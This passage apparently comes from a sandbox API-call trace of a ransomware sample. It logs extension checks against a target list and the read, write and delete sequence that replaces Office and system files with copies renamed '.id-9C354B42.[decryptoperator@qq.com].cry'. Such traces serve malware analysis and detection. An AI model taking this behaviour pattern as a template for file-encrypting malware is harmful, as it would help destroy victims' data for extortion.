Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString=".doc") returned 4 [0041.118] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString=".docx") returned 5 [0041.118] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.118] lstrlenW (lpString=".pdf") returned 4 [0041.118] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString=".xls") returned 4 [0041.118] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString=".xlsx") returned 5 [0041.118] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.118] lstrlenW (lpString=".ppt") returned 4 [0041.118] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.118] lstrlenW (lpString=".zip") returned 4 [0041.118] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.118] lstrlenW (lpString=".rar") returned 4 [0041.118] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString=".bz2") returned 4 [0041.118] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString=".7z") returned 3 [0041.118] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.118] lstrlenW (lpString=".dbf") returned 4 [0041.118] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.118] lstrlenW (lpString=".1cd") returned 4 [0041.118] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.118] lstrlenW (lpString=".jpg") returned 4 [0041.118] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.118] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.118] lstrlenW (lpString="SETUP.XML") returned 9 [0041.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.687] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=31094) returned 1 [0041.687] CloseHandle (hObject=0x184) returned 1 [0041.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20 [0041.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0041.687] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.688] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0042.140] GetLastError () returned 0x0 [0042.140] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x7976, lpOverlapped=0x0) returned 1 [0042.202] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0042.203] ReadFile (in: hFile=0x184, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.203] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.203] SetEndOfFile (hFile=0x1f4) returned 1 [0042.203] CloseHandle (hObject=0x1f4) returned 1 [0042.204] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.204] SetEndOfFile (hFile=0x184) returned 1 [0042.205] CloseHandle (hObject=0x184) returned 1 [0042.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.206] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0042.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.206] lstrlenW (lpString=".doc") returned 4 [0042.206] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.206] lstrlenW (lpString=".docx") returned 5 [0042.206] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.206] lstrlenW (lpString=".pdf") returned 4 [0042.207] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString=".xls") returned 4 [0042.207] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString=".xlsx") returned 5 [0042.207] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.207] lstrlenW (lpString=".ppt") returned 4 [0042.207] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.207] lstrlenW (lpString=".zip") returned 4 [0042.207] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.207] lstrlenW (lpString=".rar") returned 4 [0042.207] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString=".bz2") returned 4 [0042.207] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString=".7z") returned 3 [0042.207] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.207] lstrlenW (lpString=".dbf") returned 4 [0042.207] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.207] lstrlenW (lpString=".1cd") returned 4 [0042.207] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.207] lstrlenW (lpString=".jpg") returned 4 [0042.207] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.208] lstrlenW (lpString=".doc") returned 4 [0042.208] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString=".docx") returned 5 [0042.208] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.208] lstrlenW (lpString=".pdf") returned 4 [0042.208] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString=".xls") returned 4 [0042.208] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString=".xlsx") returned 5 [0042.208] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.208] lstrlenW (lpString=".ppt") returned 4 [0042.208] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.208] lstrlenW (lpString=".zip") returned 4 [0042.208] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.208] lstrlenW (lpString=".rar") returned 4 [0042.208] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString=".bz2") returned 4 [0042.208] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.208] lstrlenW (lpString=".7z") returned 3 [0042.208] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.209] lstrlenW (lpString=".dbf") returned 4 [0042.209] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.209] lstrlenW (lpString=".1cd") returned 4 [0042.209] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.209] lstrlenW (lpString=".jpg") returned 4 [0042.209] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.209] lstrcmpiW (lpString1=".DAT", lpString2=".cry") returned 1 [0042.209] lstrlenW (lpString="STOCKS.DAT") returned 10 [0042.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.813] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=39017) returned 1 [0042.813] CloseHandle (hObject=0x1bc) returned 1 [0042.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20 [0042.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.813] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.813] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0042.814] GetLastError () returned 0x0 [0042.814] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x9869, lpOverlapped=0x0) returned 1 [0042.940] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x9870, lpOverlapped=0x0) returned 1 [0042.941] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.941] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0042.942] SetEndOfFile (hFile=0x178) returned 1 [0042.942] CloseHandle (hObject=0x178) returned 1 [0042.946] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.946] SetEndOfFile (hFile=0x1bc) returned 1 [0042.947] CloseHandle (hObject=0x1bc) returned 1 [0042.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.947] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1 [0042.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.947] lstrlenW (lpString=".doc") returned 4 [0042.947] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0042.947] lstrlenW (lpString=".docx") returned 5 [0042.947] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0042.947] lstrlenW (lpString=".pdf") returned 4 [0042.947] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0042.947] lstrlenW (lpString=".xls") returned 4 [0042.947] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0042.947] lstrlenW (lpString=".xlsx") returned 5 [0042.947] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0042.947] lstrlenW (lpString=".ppt") returned 4 [0042.947] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0042.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.947] lstrlenW (lpString=".zip") returned 4 [0042.947] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0042.947] lstrlenW (lpString=".rar") returned 4 [0042.947] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".bz2") returned 4 [0042.948] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0042.948] lstrlenW (lpString=".7z") returned 3 [0042.948] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString=".dbf") returned 4 [0042.948] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString=".1cd") returned 4 [0042.948] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString=".jpg") returned 4 [0042.948] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString=".doc") returned 4 [0042.948] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".docx") returned 5 [0042.948] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0042.948] lstrlenW (lpString=".pdf") returned 4 [0042.948] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".xls") returned 4 [0042.948] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".xlsx") returned 5 [0042.948] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0042.948] lstrlenW (lpString=".ppt") returned 4 [0042.948] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.948] lstrlenW (lpString=".zip") returned 4 [0042.948] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".rar") returned 4 [0042.948] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0042.948] lstrlenW (lpString=".bz2") returned 4 [0042.948] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0042.948] lstrlenW (lpString=".7z") returned 3 [0042.948] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0042.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.949] lstrlenW (lpString=".dbf") returned 4 [0042.949] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0042.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.949] lstrlenW (lpString=".1cd") returned 4 [0042.949] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0042.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0042.949] lstrlenW (lpString=".jpg") returned 4 [0042.949] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0042.949] lstrcmpiW (lpString1=".htm", lpString2=".cry") returned 1 [0042.949] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.627] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=237) returned 1 [0043.627] CloseHandle (hObject=0x164) returned 1 [0043.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0043.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.627] lstrlenW (lpString=".doc") returned 4 [0043.627] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.627] lstrlenW (lpString=".docx") returned 5 [0043.627] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.627] lstrlenW (lpString=".pdf") returned 4 [0043.627] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.627] lstrlenW (lpString=".xls") returned 4 [0043.627] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.627] lstrlenW (lpString=".xlsx") returned 5 [0043.627] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.628] lstrlenW (lpString=".ppt") returned 4 [0043.628] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString=".zip") returned 4 [0043.628] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString=".rar") returned 4 [0043.628] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString=".bz2") returned 4 [0043.628] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.628] lstrlenW (lpString=".7z") returned 3 [0043.628] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString=".dbf") returned 4 [0043.628] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString=".1cd") returned 4 [0043.628] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString=".jpg") returned 4 [0043.628] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.628] lstrlenW (lpString=".doc") returned 4 [0043.628] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.628] lstrlenW (lpString=".docx") returned 5 [0043.628] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.628] lstrlenW (lpString=".pdf") returned 4 [0043.628] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString=".xls") returned 4 [0043.628] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.628] lstrlenW (lpString=".xlsx") returned 5 [0043.628] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.629] lstrlenW (lpString=".ppt") returned 4 [0043.629] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.629] lstrlenW (lpString=".zip") returned 4 [0043.629] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.629] lstrlenW (lpString=".rar") returned 4 [0043.629] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.629] lstrlenW (lpString=".bz2") returned 4 [0043.629] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.629] lstrlenW (lpString=".7z") returned 3 [0043.629] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.629] lstrlenW (lpString=".dbf") returned 4 [0043.629] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.629] lstrlenW (lpString=".1cd") returned 4 [0043.629] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0043.629] lstrlenW (lpString=".jpg") returned 4 [0043.629] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.629] lstrcmpiW (lpString1=".wmf", lpString2=".cry") returned 1 [0043.629] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0043.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft 